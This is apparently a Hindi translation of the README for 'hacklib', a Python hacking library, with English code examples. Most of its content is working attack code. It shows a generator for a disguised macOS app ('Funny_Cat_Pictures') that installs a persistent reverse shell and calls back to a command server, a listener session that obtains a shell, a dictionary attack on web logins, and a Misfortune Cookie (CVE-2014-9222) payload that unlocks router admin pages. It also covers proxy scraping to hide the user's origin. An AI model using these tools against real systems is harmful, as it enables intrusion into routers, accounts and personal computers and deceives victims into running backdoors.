
hacklib - पेनिट्रेशन टेस्टिंग, पोर्ट स्कैनिंग, और पायथन के साथ कहीं भी लॉग इन करना
hacklib एक पायथन मॉड्यूल है जो नेटवर्क सुरक्षा में रुचि रखने वाले हैकिंग उत्साहियों के लिए है। यह अब सक्रिय विकास में नहीं है।
hacklib प्राप्त करने के लिए, बस कमांड लाइन में चलाएँ:
pip install hacklib
hacklib का एक यूज़र इंटरफ़ेस भी है। इसका उपयोग करने के लिए, आप निम्न में से एक कर सकते हैं:
hacklib.py डाउनलोड करें और कंसोल में चलाएँ:
python hacklib.py
----------------------------------------------
Hey. What can I do you for?
Enter the number corresponding to your choice.
1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
या यदि आपने इसे pip का उपयोग करके प्राप्त किया है:
import hacklib
hacklib.userInterface()
रिवर्स शेल बैकडोरिंग (वर्तमान में केवल Mac के लिए):
import hacklib
bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
जनरेट किया गया ऐप:
सर्वर के साथ कनेक्शन सुनें:
>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!
लगभग सभी HTTP/HTTPS फॉर्म-आधारित लॉगिन और HTTP बेसिक ऑथेंटिकेशन लॉगिन के लिए यूनिवर्सल लॉगिन क्लाइंट:
import hacklib
ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')
# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'
# For logins using HTTP Basic Auth:
try:
htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed
AuthClient का उपयोग करके सरल डिक्शनरी अटैक:
import hacklib
ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)
for p in passwords:
htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
if htmldata and 'welcome' in htmldata.lower():
print 'Password is', p
break
पोर्ट स्कैनिंग:
from hacklib import *
ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default
# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
# Establish a TCP stream and sends a message
send(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\r\n\r\n')
मिसफॉर्च्यून कुकी एक्सप्लॉइट (CVE-2014-9222) PortScanner का उपयोग करके:
>>> import hacklib
# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.
# Exploitation
>>> payload = '''GET / HTTP/1.0\r\n
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.
FTP प्रमाणीकरण:
import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
ftp.login('username', 'password')
except:
print 'Login failed.'
Socks4/5 प्रॉक्सी स्क्रैपिंग और टनलिंग
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')
वर्ड मैंगलिंग:
from hacklib import *
word = Mangle("Test", 0, 10, 1990, 2016)
word.Leet()
word.Numbers()
word.Years()
आउटपुट:
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test
पैटर्न क्रिएट:
from hacklib import *
Pattern = PatternCreate(100)
Pattern.generate()
आउटपुट:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
पैटर्न ऑफ़सेट:
from hacklib import *
Offset = PatternOffset("6Ab7")
Offset.find()
आउटपुट:
[+] Offset: 50
सभी वर्गों में बाहरी निर्भरताएँ नहीं हैं, लेकिन यदि आवश्यक हो तो आप निम्न कर सकते हैं:
hacklib.installDependencies()